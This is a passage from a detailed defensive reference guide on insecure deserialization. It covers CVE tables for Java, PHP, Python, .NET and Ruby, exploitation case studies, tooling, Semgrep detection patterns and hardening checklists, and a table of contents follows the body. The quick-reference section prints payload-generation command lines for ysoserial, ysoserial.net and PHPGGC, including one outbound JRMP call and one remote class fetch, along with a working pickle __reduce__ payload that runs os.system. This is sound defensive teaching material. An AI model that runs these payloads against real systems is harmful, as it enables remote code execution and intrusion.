CVE-2022-22963	Spring Cloud Function	SpEL via `spring.cloud.function.routing-expression`
CVE-2022-22965	Spring4Shell	`Class.module.classLoader` binding exposure
CVE-2022-33980	Apache Commons Configuration	Script interpolator
CVE-2023-22518	Confluence	WebWork deserialization
CVE-2024-36991	Splunk	Path traversal → file-based deser
CVE-2026-33728	dd-trace-java RMI instrumentation	Unsafe deserialization in RMI instrumentation may lead to RCE
CVE-2026-33439	OpenAM	Pre-auth RCE via Java deserialization

PHP

CVE	Product	Chain
CVE-2015-8562	Joomla	User-Agent injection → session deser → POP chain
CVE-2016-9920	PhpMyAdmin	`__destruct` file write
CVE-2017-12794	Symfony	Property injection via session cookie
CVE-2018-17057	Yii 2	`__destruct` via BatchAction
CVE-2019-6340	Drupal 8	REST `_type` POP chain
CVE-2019-11043	PHP-FPM	Adjacent (not pure deser)
CVE-2020-28949	Archive_Tar	Phar deser via tar extract
CVE-2021-41773	—	(Apache path traversal, adjacent)
CVE-2023-1671	Sophos Web Appliance	PHP deser RCE
CVE-2024-4577	PHP CGI	Adjacent argument injection
CVE-2026-3422	U-Office Force	Critical RCE via insecure deserialization

Python

CVE	Product	Pattern
CVE-2017-7610	Ansible Tower	YAML deser
CVE-2019-20477	PyYAML	`FullLoader` bypass
CVE-2020-14343	PyYAML	Bypass of earlier fix
CVE-2022-0330	graphql-python	`pickle` session
CVE-2023-27586	torch.load	Pre-weights_only default
CVE-2025-32444	vLLM Mooncake	ZeroMQ `recv_pyobj()` on 0.0.0.0 (CVSS 10.0)
CVE-2025-24357	vLLM	Torch checkpoint untrusted load
CVE-2026-24009	Docling	PyYAML regression via unpinned dep
CVE-2026-25769	Wazuh	Critical RCE via unsafe deserialization
CVE-2026-26220	LightLLM	WebSocket pickle with broken nonce auth
CVE (picklescan)	picklescan	4 separate bypass CVEs in 2025 (Sonatype)
CVE (picklescan)	picklescan	3 zero-days disclosed by JFrog
IBM Langflow Desktop	Langflow	RCE via insecure deserialization

.NET

CVE	Product	Pattern
CVE-2017-9424	SharePoint	XmlSerializer with untyped payload
CVE-2019-0604	SharePoint	XmlSerializer via `ItemMetadata`
CVE-2020-0688	Exchange	ViewState forgery with static machine key
CVE-2020-0932	SharePoint	BinaryFormatter
CVE-2020-25258	Hyland OnBase	BinaryFormatter
CVE-2021-27076	SharePoint	Replay-style ObjectStateFormatter
CVE-2021-29508	Wire (Proto.Actor)	BinaryFormatter-backed IPC
CVE-2022-21969	Exchange	BinaryFormatter in MAPI
CVE-2023-3513	Razer Central	BinaryFormatter named pipe
CVE-2023-5914	CentralSquare	BinaryFormatter
CVE-2024-29847	Ivanti EPM	Agent Portal deserialization
CVE-2024-38094	SharePoint	XML deserialization
CVE-2025-53770	SharePoint ToolShell	ViewState deser chain, actively exploited
CVE-2026-20963	SharePoint	Deserialization RCE
CVE-2026-26114	SharePoint	Deserialization RCE
SolarWinds WHD	Web Help Desk	Java deserialization enabling command execution

Ruby

CVE	Product	Pattern
CVE-2013-0156	Rails	YAML in XML params
CVE-2019-5420	Rails 5.2	Marshal in dev mode secret key
CVE-2020-8163	Rails	Local variables in partials
CVE-2022-32224	Rails	`:marshal` cache store user-reachable
—	RubyGems.org	Multiple informational-severity Marshal issues (ToB audit)

Notable exploitation chains

SharePoint ToolShell (CVE-2025-53770, July 2025). Unauthenticated attackers POST a crafted request to /_layouts/15/ToolPane.aspx with a __VIEWSTATE carrying a deserialization payload (TextFormattingRunProperties → XAML → Process.Start). The webshell then parses additional VIEWSTATE-encoded commands. Check Point Research observed 4,600+ compromise attempts across 300+ organizations in one week; the same IPs chained Ivanti EPMM CVE-2025-4427/4428 for lateral movement. Mitigation required rotating ASP.NET machine keys in addition to patching.

WebLogic Christmas (CVE-2015-4852 → CVE-2017-10271 → CVE-2019-2725 → …). A continuous stream of deserialization RCEs against Oracle WebLogic over a 5+ year window. Each patch closed one reachable deserializer endpoint; the next CVE found another (T3 → IIOP → XMLDecoder in wls-wsat → async SOAP → …). Illustrates the “cannot patch your way out” property at enterprise scale.

Jenkins Jenkinspocalypse (CVE-2015-8103, CVE-2016-0792, CVE-2016-9299). Unauthenticated Jenkins instances exposed a CLI port that accepted serialized Java objects. CommonsCollections gadget was directly applicable. Thousands of public Jenkins instances fell in the ensuing mass-exploitation wave.

Equifax (CVE-2017-5638, Struts2). Not pure deserialization — OGNL injection via Content-Type — but illustrates the same root cause: attacker-controlled data reaches a VM that interprets it as code. Directly led to the exposure of 147 million records.

Log4Shell adjacency (CVE-2021-44228). JNDI lookups embedded in log strings fetch remote Reference objects; upon resolution, the javaSerializedData field is deserialized via the classic JDK path, re-entering the deserialization attack family through a logging front door.

12. Tools & Automation

Offensive tooling (used defensively for payload generation, detection, and validation)

Tool	Language	Purpose
ysoserial	Java	Canonical Java deserialization payload generator (~30 chains)
ysoserial.net	.NET	Equivalent for .NET with ~15 gadget families including XAML chains
marshalsec	Java	Non-JDK formats: Jackson, XStream, Kryo, Hessian, JYaml, Red5, JSON-IO
PHPGGC	PHP	Curated PHP POP chain database and payload generator
Fickling	Python	Pickle decompiler, static analyzer, payload constructor
ModelScan	Python	ML model file scanner (ProtectAI)
picklescan	Python	HuggingFace’s blocklist scanner (known bypasses exist)
GadgetProbe	Java	DNS-based blind classpath fingerprinting
Freddy	Burp plugin	Injects deserialization payloads across formats
SerialKiller	Java	Runtime allowlist enforcement (wrap around `ObjectInputStream`)
not-so-serial	Java	Runtime blocklist enforcement
ConstructionInspector	Java	Build-time gadget detection via classpath analysis
Semgrep rules	Multi	TrailOfBits published rules for Ruby (`marshal-load-method`, `rails-cache-store-marshal`, `yaml-unsafe-load`, `json-create-deserialization`)
CodeQL queries	Multi	GitHub Security Lab publishes unsafe-deserialization queries for Java, Ruby, Python, C#

ysoserial usage (defensive validation)

Security teams use ysoserial to validate that patches, allowlists, and WAF rules actually block known payloads. The tool takes a chain name and command; it emits serialized bytes suitable for piping into a test harness that represents your application’s deserialization sink. Chains select which library prerequisites must be on the classpath to succeed.

marshalsec

Moritz Bechler’s marshalsec covers the non-JDK format space (Jackson, XStream, Kryo, Hessian, JYaml, etc.). It is the reference for understanding that “Java deserialization” is not just ObjectInputStream — every polymorphic serializer in the ecosystem has the same category of bug.

PHPGGC

./phpggc Monolog/RCE1 system id produces a serialized payload for the Monolog RCE1 chain. Chains are namespaced by target library: Laravel/RCE1..n, Drupal/RCE1..n, Symfony/RCE1..n, Wordpress/RCE1..n, PrestaShop/RCE1..n, Yii/RCE1..n, and many more. Use -l <keyword> to list chains, -u to URL-encode, -b64 to base64, --phar to produce a PHAR file (for the phar:// trick).

Fickling

Trail of Bits’s Fickling disassembles pickle bytecode (a static analysis step no generic analyzer performs by default). It can detect known-malicious patterns, decompile pickle opcodes to pseudo-Python, and construct payloads to test defenses. Critically, it demonstrates how trivially pickle exploitation generalizes — any callable reachable from Python’s import system is a gadget.

Build-time detection

Dependency scanning: identify commons-collections, commons-beanutils, spring-core, jackson-databind, xstream, groovy, hibernate, c3p0, rome, snakeyaml versions against known-vulnerable ranges.
Classpath hygiene: remove unused libraries. A gadget in an unused library is still a gadget.
SBOM generation: CycloneDX/SPDX inventories plus vulnerability databases (OSS Index, GHSA) will catch most known-bad versions.

Runtime detection

Java: ObjectInputFilter (JEP 290, JDK 9+) allows allowlist/blocklist of classes during readObject. Available on modern JDKs for legacy code that cannot be rewritten.
.NET: the SerializationBinder property on BinaryFormatter allows restricting types; however, Microsoft’s own guidance states this is insufficient and BinaryFormatter should be retired entirely.
Ruby: Marshal.load has no type filter. Wrap in a custom class-checking loader or migrate.
Python: subclassing pickle.Unpickler and overriding find_class to allowlist is the documented approach. It works but is fragile — see picklescan bypass research.

13. Detection & Static Analysis

Taint source → sink patterns

Language	Source	Sink
Java	`HttpServletRequest.getInputStream()`	`new ObjectInputStream(...).readObject()`
Java	`request.getParameter(...)` → `Base64.decode`	`readObject`, `XMLDecoder.readObject`
PHP	`$_GET`, `$_POST`, `$_COOKIE`, `file_get_contents("php://input")`	`unserialize`, `yaml_parse`
PHP	Any user-controlled path	`file_exists("phar://$path")`, `filesize`, `is_dir`
Python	`request.data`, `websocket.receive_bytes`, `socket.recv`	`pickle.loads`, `joblib.load`, `torch.load`
Python	File path from DB / config / upload	`yaml.load`, `yaml.unsafe_load`
.NET	`Request.Form`, `Request.InputStream`, `Request["__VIEWSTATE"]`	`BinaryFormatter.Deserialize`, `ObjectStateFormatter.Deserialize`
.NET	`JsonConvert.DeserializeObject` with `TypeNameHandling != None`	The call itself
Ruby	`params[:data]`, `cookies[:session]`	`Marshal.load`, `YAML.load` (unsafe), `Oj.load` default
Node.js	`req.body`, `req.query`	`serialize.unserialize`, `eval`, `vm.runInNewContext`

CodeQL query shape

GitHub Security Lab’s unsafe deserialization queries model:

A set of known-dangerous deserialization calls as sinks.
A standard HTTP-input taint source set.
An intermediate “encoding” sanitizer set that does not actually sanitize but is often wrongly assumed to (Base64, URL-decode, JSON.parse).
Path constraints requiring the sink to be reachable from the source without passing through type-safe deserializers.

Semgrep / grep signatures

# Java
pattern: new ObjectInputStream($X).readObject()
pattern: new XMLDecoder(...).readObject()
pattern: new Yaml().load($X)        # SnakeYAML
pattern: $MAPPER.enableDefaultTyping()
pattern: XStream().fromXML($X)       # without setupDefaultSecurity
pattern: Kryo.readClassAndObject(...)

# PHP
pattern: unserialize($_...)
pattern: unserialize($$X) where $$X from $_GET/$_POST/$_COOKIE
pattern: yaml_parse($X)
pattern: file operation on user-controlled "phar://..."

# Python
pattern: pickle.loads(...)
pattern: pickle.load(...)
pattern: joblib.load(...)
pattern: torch.load(...)            # without weights_only=True
pattern: numpy.load(..., allow_pickle=True)
pattern: yaml.load($X)              # without SafeLoader
pattern: yaml.unsafe_load(...)
pattern: recv_pyobj()

# .NET
pattern: new BinaryFormatter().Deserialize(...)
pattern: new SoapFormatter().Deserialize(...)
pattern: new NetDataContractSerializer().ReadObject(...)
pattern: new ObjectStateFormatter().Deserialize(...)
pattern: new LosFormatter().Deserialize(...)
pattern: JsonConvert.DeserializeObject<$T>(..., settings with TypeNameHandling.All|Objects|Arrays|Auto)
pattern: new JavaScriptSerializer(new SimpleTypeResolver())

# Ruby
pattern: Marshal.load(...)
pattern: YAML.load(...)             # if pre-Psych 4
pattern: YAML.unsafe_load(...)
pattern: Oj.load(...)               # default mode
pattern: JSON.parse(..., create_additions: true)
pattern: Rails.cache with :marshal coder

# Node.js
pattern: serialize.unserialize(...)
pattern: eval(<user data>)
pattern: new Function(<user data>)
pattern: vm.runInNewContext(<user data>)

Runtime telemetry signals

Java ClassNotFoundException bursts during deserialization — attacker probing which gadget classes exist.
Outbound DNS lookups correlated with request handlers — URLDNS probe pattern.
JRMP/LDAP outbound from app servers — JNDI gadget signal.
Process spawn by application JVM/CLR/PHP/Python workers — deserialization RCE footprint.
Unusual child processes under w3wp.exe — ViewState RCE.
Memory/CPU spikes with deep object graphs — DoS attempts.
readObject stack frames in production stack traces — inventory for review.

Log-based detection

Log deserialization exceptions. Many real exploits throw exceptions partway through the chain (e.g., cast failures after the side-effect-bearing gadget fires). A spike of ClassCastException, InvalidClassException, java.io.StreamCorruptedException, _pickle.UnpicklingError, TypeError: __reduce__ is a signal.

14. Prevention & Mitigation

The hierarchy of fixes (strongest first)

1. Don’t deserialize untrusted data at all. This is the only truly safe position. Use a format that cannot encode arbitrary classes: JSON (without @class / $type / polymorphic typing), Protocol Buffers, MessagePack, CBOR, FlatBuffers, Cap’n Proto. Parse these into fixed, known data types — never “generic object.”

2. If you must use a native format, use integrity protection. Sign the serialized blob with an HMAC using a server-held key. Verify the signature before invoking any deserialization. This does not make deserialization safe — it merely ensures the bytes came from your own code. Ruby’s MessageVerifier, Rails signed cookies, and JWT (with proper algorithm binding) are examples. Caveat: key leaks (ASP.NET machine key, Rails secret_key_base) turn this from a hard problem into a trivial one, as ViewState exploits repeatedly demonstrate.

3. Apply type allowlists at the deserializer.

Java: ObjectInputFilter.Config.setSerialFilter(...) globally, or per-stream via oos.setObjectInputFilter(...) (JEP 290). Allowlist expected classes only.
.NET: abandon BinaryFormatter. If unavoidable, a SerializationBinder restricting types is the documented mitigation — but Microsoft explicitly says this cannot be made secure.
Python: subclass pickle.Unpickler, override find_class(module, name) to raise on anything not in a tight allowlist. Better: use the PickleBall approach of per-library generated policies.
Ruby: wrap Marshal.load — no built-in filter exists. Trail of Bits recommends adding Marshal.safe_load upstream.
PHP: unserialize($data, ['allowed_classes' => ['ExpectedClass']]) (PHP 7.0+) restricts instantiation but does not prevent __wakeup/__destruct on allowed classes from being abused.

4. Isolate the deserializer. Run the code that does deserialization in a separate process, container, or sandbox with:

No network egress to metadata services or internal endpoints
Read-only filesystem where possible
Minimal privileges (non-root, no cloud credentials via IMDS)
Resource limits to bound DoS blast radius

5. Defense in depth. Logging, anomaly detection, WAF rules for serialized magic bytes (rO0, AAEAAAD, O: at start of body), egress filtering of JRMP/LDAP/unusual DNS patterns.

Format-specific migration targets

From	To
Java `ObjectInputStream`	JSON (Jackson with fixed types, no default typing) or Protobuf
PHP `unserialize`	`json_encode` / `json_decode` with explicit fields
Python `pickle` for models	Safetensors for tensors, ONNX for graphs, JSON for metadata
Python `pickle` for IPC	JSON, MessagePack, Protobuf
Ruby `Marshal`	JSON with typed columns, MessagePack, Protobuf
.NET `BinaryFormatter`	`System.Text.Json` or DataContractSerializer with known types
ASP.NET ViewState	Stateless pages, signed tokens, server-side session
YAML with types	`safe_load` / `SafeConstructor`; never `yaml.load` (Python pre-5.1) or `Yaml().load` (SnakeYAML <2.0)

ML pipeline hardening checklist

Based on the lessons from CVE-2025-32444, CVE-2026-26220, and the picklescan bypass research:

Migrate model weights to safetensors wherever possible. Default in HuggingFace transformers since 2022.
Set torch.load(..., weights_only=True) on every load site. torch.load without this is a code review finding.
Never call joblib.load on user-controlled paths. Never call it on paths whose chain of custody isn’t fully trusted.
Sign model artifacts at training time with a key managed separately from the model storage. Verify before load.
If you must support pickle, use PickleBall per-library policies rather than blocklist scanners.
Do not use pickle as an IPC format between distributed serving nodes. Use JSON/MessagePack/Protobuf. recv_pyobj() is the anti-pattern.
Ensure distributed serving sockets bind to localhost or authenticated-only listeners. Verify default configurations — LightLLM’s empty-string nonce is the cautionary tale.
Scan model uploads with ModelScan + Fickling, knowing both have bypasses.
Restrict the process running inference: no IMDS, no outbound egress, minimal filesystem.
Log every model load path. Alert on loads from unexpected origins.

.NET / SharePoint hardening checklist (post-ToolShell)

Apply all SharePoint deserialization patches immediately on release; patch velocity is the single strongest signal in the CVE-2025-53770 victim distribution.
Rotate ASP.NET machine keys. Assume any machine key that was ever on a compromised host is burned.
Enable AMSI (Anti-Malware Scan Interface) integration for SharePoint.
Restrict ViewState to MAC-validated, encrypted mode.
Front SharePoint with a WAF with deserialization payload signatures; limit internet exposure where possible.
Inventory BinaryFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter, ObjectStateFormatter usages and plan retirement.
Block outbound LDAP, RMI, and arbitrary HTTP from IIS worker processes.
Monitor w3wp.exe spawning cmd.exe, powershell.exe, certutil.exe.

Java hardening checklist

Enable JEP 290 global filter with an allowlist. Start with an aggressive default-deny list and allowlist observed legitimate classes.
Inventory and upgrade: commons-collections (>=3.2.2 removed unsafe functors; >=4.1 for 4.x), commons-beanutils (>=1.9.4), jackson-databind (latest), xstream (>=1.4.20), snakeyaml (>=2.0), log4j (>=2.17.1).
Remove Jackson default typing. Never call enableDefaultTyping() or set @JsonTypeInfo(use = Id.CLASS) on untrusted input.
Disable RMI registry exposure. Do not publish JMX on untrusted networks.
Retire XMLDecoder for untrusted input entirely.
Audit any custom readObject, readResolve, readExternal methods in your own code.
Set up outbound firewall rules from JVM processes — block unexpected JRMP/LDAP traffic.

PHP hardening checklist

Replace all unserialize($untrusted) with json_decode($untrusted) where possible.
Where replacement is infeasible, use unserialize($data, ['allowed_classes' => false]) or a tight allowlist.
Upgrade to PHP 8+ to eliminate implicit phar metadata deserialization.
Audit all file operations for phar:// reachability from user input.
Store session data using a non-serializing handler or sign cookies.
Disable unserialize_callback_func.
Inventory and update CMS platforms: Drupal, Joomla, WordPress, Magento, PrestaShop.

Ruby hardening checklist

Replace Marshal.load(untrusted) with JSON with explicit schema.
Migrate Rails cache store off :marshal (Rails 7.1+ defaults to :json for some stores; verify).
Upgrade Ruby to 3.1+ for YAML.load safe default.
Disable JSON.parse(create_additions: true) and Oj.load default mode.
Run TrailOfBits’s Semgrep rules in CI: marshal-load-method, rails-cache-store-marshal, yaml-unsafe-load, json-create-deserialization.
Audit any custom marshal_load / marshal_dump methods.

15. Signature & Gadget Quick Reference

Magic bytes / payload prefixes

Java serialized (raw):        AC ED 00 05
Java serialized (base64):     rO0AB
.NET BinaryFormatter:         00 01 00 00 00 FF FF FF FF 01 00 00 00
.NET BinaryFormatter (b64):   AAEAAAD/////AQAAAA
Python pickle (proto 2):      80 02
Python pickle (proto 4):      80 04
Python pickle (proto 5):      80 05
Ruby Marshal:                 04 08
PHP serialized object:        O:<digit>+:"
PHP serialized array:         a:<digit>+:{
ASP.NET ViewState prefix:     /wEP / /wEX / /wET
PHAR stub:                    <?php __HALT_COMPILER();
SnakeYAML tag prefix:         !!javax. / !!org. / !!java.

Java ysoserial chain selector

ysoserial CommonsCollections1 "cmd"   # JDK ≤ 8u71 + commons-collections 3.x
ysoserial CommonsCollections5 "cmd"   # any JDK + commons-collections 3.x
ysoserial CommonsCollections6 "cmd"   # any JDK + commons-collections 3.x
ysoserial CommonsBeanutils1 "cmd"     # commons-beanutils + commons-collections
ysoserial Groovy1 "cmd"               # groovy ≤ 2.4.3
ysoserial Hibernate1 "cmd"            # hibernate 3.x
ysoserial Jdk7u21 "cmd"               # pure JDK ≤ 7u21 (no external deps)
ysoserial JRMPClient "rmi://host:port/obj"  # outbound JRMP
ysoserial URLDNS "http://probe.dns/"  # blind probe, no RCE
ysoserial Spring1 "cmd"               # older spring-core
ysoserial ROME "cmd"                  # ROME + Spring
ysoserial MozillaRhino1 "cmd"         # mozilla rhino
ysoserial Click1 "cmd"                # click framework
ysoserial Clojure "cmd"               # clojure 1.x
ysoserial C3P0 "http://host/" Exploit # c3p0 JNDI fetch + class

.NET ysoserial.net gadgets

ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "calc"
ysoserial.exe -g TextFormattingRunProperties -f Json.Net -c "calc"
ysoserial.exe -g ActivitySurrogateSelector -f BinaryFormatter -c calc.cs
ysoserial.exe -g WindowsIdentity -f BinaryFormatter -c "calc"
ysoserial.exe -g DataSet -f XmlSerializer -c "calc"
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc"
ysoserial.exe -g SessionSecurityToken -f BinaryFormatter -c "calc"

PHPGGC chain selector

phpggc -l laravel       # list Laravel chains
phpggc Laravel/RCE1 system id
phpggc Monolog/RCE1 system id
phpggc Guzzle/RCE1 system id
phpggc WordPress/RCE1 system id
phpggc Drupal/RCE1 system id
phpggc Symfony/RCE4 system id
phpggc -b -u Laravel/RCE9 system id   # base64 URL-encoded
phpggc --phar=zip Monolog/RCE1 system id -o payload.phar

Python pickle one-liner test

import pickle, os
class P:
    def __reduce__(self):
        return (os.system, ("id",))
payload = pickle.dumps(P())
# Never use this on production systems — defensive validation only

Ruby Marshal gadget family (current canonical)

Gem::SpecFetcher
 └─ Gem::Version
     └─ Gem::RequestSet::Lockfile
         └─ Gem::RequestSet
             └─ Gem::Resolver::SpecSpecification
                 └─ Gem::Resolver::GitSpecification
                     └─ Gem::Source::Git
                         └─ git clone with backtick-injected reference
                             └─ shell metacharacter expansion → RCE

Magic method hooks by language

Language	Hooks fired during / after deserialization
Java	`readObject`, `readResolve`, `readObjectNoData`, `readExternal`, `validateObject`, custom `finalize`
PHP	`__wakeup`, `__unserialize`, `__destruct`, `__toString`, `__call`, `__invoke`, `__get`, `__set`
Python (pickle)	`__reduce__`, `__reduce_ex__`, `__setstate__`, `__getstate__`, `__new__`, `__init_subclass__`
.NET	`[OnDeserializing]`, `[OnDeserialized]`, `ISerializable.GetObjectData`, constructor with `SerializationInfo`, `IDeserializationCallback.OnDeserialization`
Ruby (Marshal)	`marshal_load`, `_load`, `_dump_data`, `init_with` (YAML), `encode_with`
Node.js	`toJSON`, any property getters triggered during reconstruction, `eval`-based schemes via `Function` strings

Universal defensive rule of thumb

If a byte stream from the network, disk, or database reconstructs an object by choosing the object’s class from inside the byte stream — treat it as code. If it reaches a native deserialization API of any language described above without HMAC verification, a hard type allowlist, and process isolation, it is a remote code execution vulnerability. Not “potentially.” Not “if gadgets are present.” Gadgets are always present on any real-world classpath. The question is only whether anyone has enumerated them yet.

Compiled from 47 research sources covering OWASP guidance, PortSwigger Web Security Academy, TrailOfBits Ruby research, GitHub Security Lab CodeQL queries, GreyNoise Labs, Sonar, Check Point, Resecurity, Brown University PickleBall research, Sonatype and JFrog picklescan bypasses, ysoserial / ysoserial.net / marshalsec / PHPGGC project documentation, Microsoft .NET security advisories, and CVE write-ups spanning 2013–2026.

Comprehensive Insecure Deserialization Guide#

Table of Contents#

1. Fundamentals#

2. Attack Surface & Entry Points#

Where serialized blobs cross trust boundaries#

Sink functions by language#

Content-type & magic byte fingerprints#

3. Java Deserialization#

The core primitive#

Classic sink entry points#

Gadget chain anatomy (CommonsCollections1)#

Why patching individual gadgets fails#

Well-known gadget chain families (ysoserial)#

SnakeYAML (CVE-2022-1471)#

Jackson polymorphic deserialization#

4. PHP Object Injection#

The unserialize() primitive#

Serialized string format#

Property-Oriented Programming (POP) chains#

Phar deserialization (pre-PHP 8)#

Common PHP deserialization entry points#

5. Python Pickle & ML Pipelines#

Pickle is a stack VM, not a data format#

The ML pipeline problem#

CVE-2025-32444 (vLLM, CVSS 10.0)#

LightLLM (CVE-2026-26220)#

PickleScan is fundamentally fragile#

torch.load: incomplete migration#

Supply-chain vector#

PyYAML’s yaml.load#

6. .NET Deserialization#

The dangerous formatters#

Sink patterns#

Known .NET RCE gadget families (ysoserial.net)#

XAML ObjectDataProvider — the universal .NET gadget#

ASP.NET ViewState#

Notable .NET deserialization CVEs#

7. Ruby Marshal & YAML#

Marshal.load — a decade of whack-a-mole#

Gadget chain timeline#

The Gem::SpecFetcher → Runtime chain (2024)#

Where Marshal lurks in real apps#

YAML.load and Psych#

JSON.parse(create_additions: true)#

8. Node.js Deserialization#

The node-serialize footgun#

funcster, serialize-javascript#

Prototype pollution adjacency#

YAML in Node.js#

Main sinks to grep for#

9. YAML & JSON Format Attacks#

YAML is not “just data”#

CVE-2022-1471 (SnakeYAML)#

CVE-2026-24009 (Docling RCE via PyYAML)#

JSON deserialization dangers#

XML deserialization#

10. Gadget Chains Explained#

The chain-of-method-dispatch abstraction#

Why chains exist (the Russian doll metaphor)#

Gadget hunting methodology#

Automated gadget discovery tools#

The “unpatchable” property#

11. Real-World CVEs & Exploitation Chains#

Java#

PHP#

Python#

.NET#

Ruby#

Notable exploitation chains#

12. Tools & Automation#

Offensive tooling (used defensively for payload generation, detection, and validation)#

ysoserial usage (defensive validation)#

marshalsec#

PHPGGC#

Fickling#

Build-time detection#

Runtime detection#

13. Detection & Static Analysis#

Taint source → sink patterns#

CodeQL query shape#